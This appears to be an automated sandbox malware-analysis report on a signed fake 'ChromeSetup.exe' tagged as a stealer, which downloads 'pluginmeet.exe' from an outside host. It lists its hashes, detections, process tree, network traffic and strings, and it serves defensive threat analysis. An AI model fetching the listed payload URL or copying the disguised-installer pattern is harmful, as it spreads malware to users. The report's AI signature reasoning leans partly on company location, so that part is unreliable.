Edit tour

Windows Analysis Report
ChromeSetup.exe

Overview

General Information

Sample name:	ChromeSetup.exe
Analysis ID:	1632177
MD5:	3dadab41987ce43aeca0c09430f0a38a
SHA1:	f24f29afd8de6381017a422ae332022dbd2312b4
SHA256:	0b44a1854f9dc2eab5625dffc1ceb17b1e89773c9ee04802a2f40dfd834dec2c
Tags:	exeHangzhouRongyiNetworkTechnologyCoLtdRustyStealersigneduser-aachum
Infos:

Detection

Score:	42
Range:	0 - 100
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

AI detected suspicious PE digital signature

Creates HTML files with .exe extension (expired dropper behavior)

AV process strings found (often used to terminate AV products)

Contains functionality to call native functions

Contains functionality to communicate with device drivers

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Detected potential crypto function

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

One or more processes crash

Queries the volume information (name, serial number etc) of a device

Classification

Process Tree

System is w10x64

ChromeSetup.exe (PID: 7296 cmdline: "C:\Users\user\Desktop\ChromeSetup.exe" MD5: 3DADAB41987CE43AECA0C09430F0A38A)

conhost.exe (PID: 7304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WerFault.exe (PID: 8032 cmdline: C:\Windows\system32\WerFault.exe -u -p 7296 -s 600 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

cleanup

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: ChromeSetup.exe	Virustotal: Detection: 19%			Perma Link
Source: ChromeSetup.exe	ReversingLabs: Detection: 13%

Source: ChromeSetup.exe

Static PE information: certificate valid

Source: ChromeSetup.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:

Binary string: download_and_run.pdb source: ChromeSetup.exe

Source: C:\Users\user\Desktop\ChromeSetup.exe

Code function: 0_2_00007FF77525C430 CloseHandle,FindFirstFileW,FindClose,

0_2_00007FF77525C430

Networking

Creates HTML files with .exe extension (expired dropper behavior)

Source: C:\Users\user\Desktop\ChromeSetup.exe

File created: pluginmeet.exe.0.dr

Source: global traffic

HTTP traffic detected: GET /pluginmeet.exe HTTP/1.1accept: */*host: v128235.hostnl03.fornex.host

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /pluginmeet.exe HTTP/1.1accept: */*host: v128235.hostnl03.fornex.host

Source: global traffic

DNS traffic detected: DNS query: v128235.hostnl03.fornex.host

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginxDate: Fri, 07 Mar 2025 19:31:54 GMTContent-Type: text/html; charset=utf-8Content-Length: 4856Connection: keep-aliveData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 3a 20 d0 a1 d1 82 d1 80 d0 b0 d0 bd d0 b8 d1 86 d0 b0 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd d0 b0 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 20 2f 3e 0a 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 73 74 61 74 69 63 2d 66 6f 72 6e 65 78 2d 63 75 73 74 6f 6d 2f 63 73 73 2f 62 61 73 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 20 20 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 20 68 65 61 64 65 72 2d 62 67 22 3e 0a 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 75 72 6c 28 27 2f 73 74 61 74 69 63 2d 66 6f 72 6e 65 78 2d 63 75 73 74 6f 6d 2f 69 6d 67 2f 70 72 6c 78 2d 62 67 2d 6d 61 69 6e 2e 70 6e 67 27 29 3b 22 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 2d 62 67 2d 69 6d 61 67 65 20 68 64 6e 2d 6c 67 22 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 2d 69 6e 6e 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 61 62 6c 65 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 65 66 74 2d 6e 61 76 20 74 61 62 6c 65 2d 63 65 6c 6c 2d 6d 64 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 72 6e 65 78 2e 63 6f 6d 2f 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 73 74 61 74 69 63 2d 66 6f 72 6e 65 78 2d 63 75 73 74 6f 6d 2f 69 6d 67 2f 6c 6f 67 6f 2e 70 6e 67 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 72 63 73 65 74 3d 22 2f 73 74 61 74 69 63 2d 66 6f 72 6e 65 78 2d 63 75 73 74 6f 6d 2f 69 6d 67 2f 6c 6f 67 6f 40 32 78 2e 70 6e 67 20 32 78 22 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 20 6c 6f 67 6f 2d 6c 69 67 68 74 22 20 2f 3e 3c 2f 61 3e 3c 61 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 72 6e 65 78 2e 63 6f 6d 2f 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 73 74 61 74 69 63 2d 66 6f 72 6e 65 78 2d 63 75 73 74 6f 6d 2f 69 6d 67 2f 6c 6f 67 6f 2d 64 61 72 6b 2e 70 6e 67 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 72 63 73 65 74 3d 22 2f 73 74 61 74 69 63 2d 66 6f 72 6e 65 78 2d 63 75 73 74 6f 6d 2f 69 6d 67 2f 6c 6f 67 6f 2d 64 61 72 6b 40 32 78 2e 70 6e 67 20 32 78 22 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 20 6c 6f 67 6f 2d 64 61 72 6b 22 20 2f 3e 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64

Source: ChromeSetup.exe	String found in binary or memory: http://cevcsca2021.crl.certum.pl/cevcsca2021.crl0w
Source: ChromeSetup.exe	String found in binary or memory: http://cevcsca2021.ocsp-certum.com07
Source: ChromeSetup.exe	String found in binary or memory: http://crl.certum.pl/ctnca2.crl0l
Source: ChromeSetup.exe	String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: ChromeSetup.exe	String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: ChromeSetup.exe	String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: ChromeSetup.exe	String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: ChromeSetup.exe	String found in binary or memory: http://repository.certum.pl/cevcsca2021.cer0
Source: ChromeSetup.exe	String found in binary or memory: http://repository.certum.pl/ctnca2.cer09
Source: ChromeSetup.exe	String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: ChromeSetup.exe	String found in binary or memory: http://subca.ocsp-certum.com02
Source: Amcache.hve.11.dr	String found in binary or memory: http://upx.sf.net
Source: ChromeSetup.exe, 00000000.00000002.1719320385.000001131631F000.00000004.00000020.00020000.00000000.sdmp, ChromeSetup.exe, 00000000.00000003.1328237733.000001131631E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://v128235.hostnl03.fornex.host/pluginmeet.exe
Source: ChromeSetup.exe, 00000000.00000002.1719320385.000001131631F000.00000004.00000020.00020000.00000000.sdmp, ChromeSetup.exe, 00000000.00000003.1328237733.000001131631E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://v128235.hostnl03.fornex.host/pluginmeet.exeG
Source: ChromeSetup.exe, 00000000.00000002.1719320385.000001131631F000.00000004.00000020.00020000.00000000.sdmp, ChromeSetup.exe, 00000000.00000003.1328237733.000001131631E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://v128235.hostnl03.fornex.host/pluginmeet.exes
Source: ChromeSetup.exe	String found in binary or memory: http://www.certum.pl/CPS0
Source: pluginmeet.exe.0.dr	String found in binary or memory: https://fornex.com/
Source: ChromeSetup.exe, 00000000.00000003.1328123430.0000011316354000.00000004.00000020.00020000.00000000.sdmp, pluginmeet.exe.0.dr	String found in binary or memory: https://fornex.com/backup/
Source: ChromeSetup.exe, 00000000.00000003.1328123430.0000011316354000.00000004.00000020.00020000.00000000.sdmp, pluginmeet.exe.0.dr	String found in binary or memory: https://fornex.com/dedicated/
Source: ChromeSetup.exe, 00000000.00000002.1719046578.0000000EC07EB000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: https://fornex.com/help/cpanel-first
Source: ChromeSetup.exe, 00000000.00000003.1328123430.0000011316354000.00000004.00000020.00020000.00000000.sdmp, pluginmeet.exe.0.dr	String found in binary or memory: https://fornex.com/help/cpanel-first-steps/
Source: ChromeSetup.exe, 00000000.00000003.1328123430.0000011316354000.00000004.00000020.00020000.00000000.sdmp, pluginmeet.exe.0.dr	String found in binary or memory: https://fornex.com/help/faq/
Source: ChromeSetup.exe, 00000000.00000003.1328123430.0000011316354000.00000004.00000020.00020000.00000000.sdmp, pluginmeet.exe.0.dr	String found in binary or memory: https://fornex.com/help/transfer-site/
Source: ChromeSetup.exe, 00000000.00000003.1328123430.0000011316354000.00000004.00000020.00020000.00000000.sdmp, pluginmeet.exe.0.dr	String found in binary or memory: https://fornex.com/my/tickets/
Source: ChromeSetup.exe, 00000000.00000003.1328123430.0000011316354000.00000004.00000020.00020000.00000000.sdmp, pluginmeet.exe.0.dr	String found in binary or memory: https://fornex.com/ssd-hosting/
Source: ChromeSetup.exe, 00000000.00000003.1328123430.0000011316354000.00000004.00000020.00020000.00000000.sdmp, pluginmeet.exe.0.dr	String found in binary or memory: https://fornex.com/ssd-vps/
Source: ChromeSetup.exe, 00000000.00000003.1328123430.0000011316354000.00000004.00000020.00020000.00000000.sdmp, pluginmeet.exe.0.dr	String found in binary or memory: https://fornex.com/vpn/
Source: ChromeSetup.exe	String found in binary or memory: https://www.certum.pl/CPS0
Source: ChromeSetup.exe	String found in binary or memory: https://www.globalsign.com/repository/0

Source: C:\Users\user\Desktop\ChromeSetup.exe	Code function: 0_2_00007FF77522AD80 NtCreateFile,RtlNtStatusToDosError,CreateIoCompletionPort,SetFileCompletionNotificationModes,CloseHandle,	0_2_00007FF77522AD80
Source: C:\Users\user\Desktop\ChromeSetup.exe	Code function: 0_2_00007FF7752285E0 NtCancelIoFileEx,NtDeviceIoControlFile,RtlNtStatusToDosError,NtCancelIoFileEx,RtlNtStatusToDosError,RtlNtStatusToDosError,GetQueuedCompletionStatusEx,GetQueuedCompletionStatusEx,	0_2_00007FF7752285E0
Source: C:\Users\user\Desktop\ChromeSetup.exe	Code function: 0_2_00007FF77525C970 NtWriteFile,WaitForSingleObject,RtlNtStatusToDosError,	0_2_00007FF77525C970
Source: C:\Users\user\Desktop\ChromeSetup.exe	Code function: 0_2_00007FF775227EA0 NtCancelIoFileEx,RtlNtStatusToDosError,	0_2_00007FF775227EA0

Source: C:\Users\user\Desktop\ChromeSetup.exe

Code function: 0_2_00007FF7752285E0: NtCancelIoFileEx,NtDeviceIoControlFile,RtlNtStatusToDosError,NtCancelIoFileEx,RtlNtStatusToDosError,RtlNtStatusToDosError,GetQueuedCompletionStatusEx,GetQueuedCompletionStatusEx,

0_2_00007FF7752285E0

Source: C:\Users\user\Desktop\ChromeSetup.exe	Code function: 0_2_00007FF7752285E0	0_2_00007FF7752285E0
Source: C:\Users\user\Desktop\ChromeSetup.exe	Code function: 0_2_00007FF77525E300	0_2_00007FF77525E300
Source: C:\Users\user\Desktop\ChromeSetup.exe	Code function: 0_2_00007FF775228C40	0_2_00007FF775228C40
Source: C:\Users\user\Desktop\ChromeSetup.exe	Code function: 0_2_00007FF77514BE4C	0_2_00007FF77514BE4C
Source: C:\Users\user\Desktop\ChromeSetup.exe	Code function: 0_2_00007FF7751CB620	0_2_00007FF7751CB620
Source: C:\Users\user\Desktop\ChromeSetup.exe	Code function: 0_2_00007FF77527B630	0_2_00007FF77527B630
Source: C:\Users\user\Desktop\ChromeSetup.exe	Code function: 0_2_00007FF775255E20	0_2_00007FF775255E20
Source: C:\Users\user\Desktop\ChromeSetup.exe	Code function: 0_2_00007FF77521C6C0	0_2_00007FF77521C6C0
Source: C:\Users\user\Desktop\ChromeSetup.exe	Code function: 0_2_00007FF77518F700	0_2_00007FF77518F700
Source: C:\Users\user\Desktop\ChromeSetup.exe	Code function: 0_2_00007FF77518F580	0_2_00007FF77518F580
Source: C:\Users\user\Desktop\ChromeSetup.exe	Code function: 0_2_00007FF77518DD60	0_2_00007FF77518DD60
Source: C:\Users\user\Desktop\ChromeSetup.exe	Code function: 0_2_00007FF77527C570	0_2_00007FF77527C570
Source: C:\Users\user\Desktop\ChromeSetup.exe	Code function: 0_2_00007FF7751C2570	0_2_00007FF7751C2570
Source: C:\Users\user\Desktop\ChromeSetup.exe	Code function: 0_2_00007FF77528F850	0_2_00007FF77528F850
Source: C:\Users\user\Desktop\ChromeSetup.exe	Code function: 0_2_00007FF77525B840	0_2_00007FF77525B840
Source: C:\Users\user\Desktop\ChromeSetup.exe	Code function: 0_2_00007FF7751E5870	0_2_00007FF7751E5870
Source: C:\Users\user\Desktop\ChromeSetup.exe	Code function: 0_2_00007FF77514BE4C	0_2_00007FF77514BE4C
Source: C:\Users\user\Desktop\ChromeSetup.exe	Code function: 0_2_00007FF7752730A0	0_2_00007FF7752730A0
Source: C:\Users\user\Desktop\ChromeSetup.exe	Code function: 0_2_00007FF775274900	0_2_00007FF775274900
Source: C:\Users\user\Desktop\ChromeSetup.exe	Code function: 0_2_00007FF775263F30	0_2_00007FF775263F30
Source: C:\Users\user\Desktop\ChromeSetup.exe	Code function: 0_2_00007FF7751CBFC0	0_2_00007FF7751CBFC0
Source: C:\Users\user\Desktop\ChromeSetup.exe	Code function: 0_2_00007FF775278A90	0_2_00007FF775278A90
Source: C:\Users\user\Desktop\ChromeSetup.exe	Code function: 0_2_00007FF7751982A0	0_2_00007FF7751982A0
Source: C:\Users\user\Desktop\ChromeSetup.exe	Code function: 0_2_00007FF7752232F0	0_2_00007FF7752232F0
Source: C:\Users\user\Desktop\ChromeSetup.exe	Code function: 0_2_00007FF7752112F0	0_2_00007FF7752112F0
Source: C:\Users\user\Desktop\ChromeSetup.exe	Code function: 0_2_00007FF7752662F0	0_2_00007FF7752662F0
Source: C:\Users\user\Desktop\ChromeSetup.exe	Code function: 0_2_00007FF7751901C0	0_2_00007FF7751901C0
Source: C:\Users\user\Desktop\ChromeSetup.exe	Code function: 0_2_00007FF77527AA10	0_2_00007FF77527AA10
Source: C:\Users\user\Desktop\ChromeSetup.exe	Code function: 0_2_00007FF7752961F0	0_2_00007FF7752961F0
Source: C:\Users\user\Desktop\ChromeSetup.exe	Code function: 0_2_00007FF7751CE430	0_2_00007FF7751CE430
Source: C:\Users\user\Desktop\ChromeSetup.exe	Code function: 0_2_00007FF775259490	0_2_00007FF775259490
Source: C:\Users\user\Desktop\ChromeSetup.exe	Code function: 0_2_00007FF77526FC80	0_2_00007FF77526FC80
Source: C:\Users\user\Desktop\ChromeSetup.exe	Code function: 0_2_00007FF7751C3C70	0_2_00007FF7751C3C70
Source: C:\Users\user\Desktop\ChromeSetup.exe	Code function: 0_2_00007FF775279CA0	0_2_00007FF775279CA0
Source: C:\Users\user\Desktop\ChromeSetup.exe	Code function: 0_2_00007FF77528D330	0_2_00007FF77528D330
Source: C:\Users\user\Desktop\ChromeSetup.exe	Code function: 0_2_00007FF77518FB30	0_2_00007FF77518FB30
Source: C:\Users\user\Desktop\ChromeSetup.exe	Code function: 0_2_00007FF7751CC370	0_2_00007FF7751CC370

Source: C:\Users\user\Desktop\ChromeSetup.exe	Code function: String function: 00007FF775296A30 appears 109 times
Source: C:\Users\user\Desktop\ChromeSetup.exe	Code function: String function: 00007FF775296930 appears 71 times

Source: C:\Users\user\Desktop\ChromeSetup.exe

Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7296 -s 600

Source: ChromeSetup.exe	Binary string: Failed to open \Device\Afd\Mio: 0
Source: ChromeSetup.exe	Binary string: \Device\Afd\Mio

Source: classification engine

Classification label: mal42.winEXE@3/7@1/1

Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7296
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7304:120:WilError_03

Source: C:\Users\user\Desktop\ChromeSetup.exe

File created: C:\Users\user\AppData\Local\Temp\pluginmeet.exe

Jump to behavior

Source: ChromeSetup.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\ChromeSetup.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: ChromeSetup.exe	Virustotal: Detection: 19%
Source: ChromeSetup.exe	ReversingLabs: Detection: 13%

Source: ChromeSetup.exe

String found in binary or memory: /load_hpack; header malformed -- pseudo not at head of block

Source: unknown	Process created: C:\Users\user\Desktop\ChromeSetup.exe "C:\Users\user\Desktop\ChromeSetup.exe"
Source: C:\Users\user\Desktop\ChromeSetup.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\ChromeSetup.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7296 -s 600

Source: C:\Users\user\Desktop\ChromeSetup.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	Section loaded: fwpuclnt.dll	Jump to behavior

Source: ChromeSetup.exe

Static PE information: certificate valid

Source: ChromeSetup.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: ChromeSetup.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: ChromeSetup.exe

Static file information: File size 2172168 > 1048576

Source: ChromeSetup.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x156600

Source: ChromeSetup.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: ChromeSetup.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:

Binary string: download_and_run.pdb source: ChromeSetup.exe

Persistence and Installation Behavior

AI detected suspicious PE digital signature

Source: Initial sample

Joe Sandbox AI: Detected suspicious elements in PE signature: Multiple suspicious indicators: 1) Company is based in China (Hangzhou) which has lower trust reputation for software signing. 2) The compilation date (Oct 2024) and certificate validity period (Sept 2024-2025) are future dates compared to current date (March 2025), suggesting timestamp manipulation. 3) While the certificate issuer Certum is a known CA, the subject organization 'Hangzhou Rongyi Network Technology' has limited public reputation and track record. 4) The certificate is technically valid but the future dates strongly indicate malicious intent to bypass security controls. The combination of suspicious geography, future timestamps, and unknown organization suggests this is likely a compromised or fraudulently obtained certificate being used for malware signing.

Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\ChromeSetup.exe

Code function: 0_2_00007FF77525C430 CloseHandle,FindFirstFileW,FindClose,

0_2_00007FF77525C430

Source: Amcache.hve.11.dr	Binary or memory string: VMware
Source: ChromeSetup.exe, 00000000.00000002.1719340890.0000011316342000.00000004.00000020.00020000.00000000.sdmp, ChromeSetup.exe, 00000000.00000003.1328189627.000001131633F000.00000004.00000020.00020000.00000000.sdmp, ChromeSetup.exe, 00000000.00000003.1328215470.0000011316341000.00000004.00000020.00020000.00000000.sdmp, ChromeSetup.exe, 00000000.00000003.1328155493.000001131633F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll``=
Source: Amcache.hve.11.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.11.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.11.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.11.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.11.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.11.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.11.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.11.dr	Binary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
Source: Amcache.hve.11.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.11.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.11.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.11.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.11.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.11.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.11.dr	Binary or memory string: \driver\vmci,\driver\pci
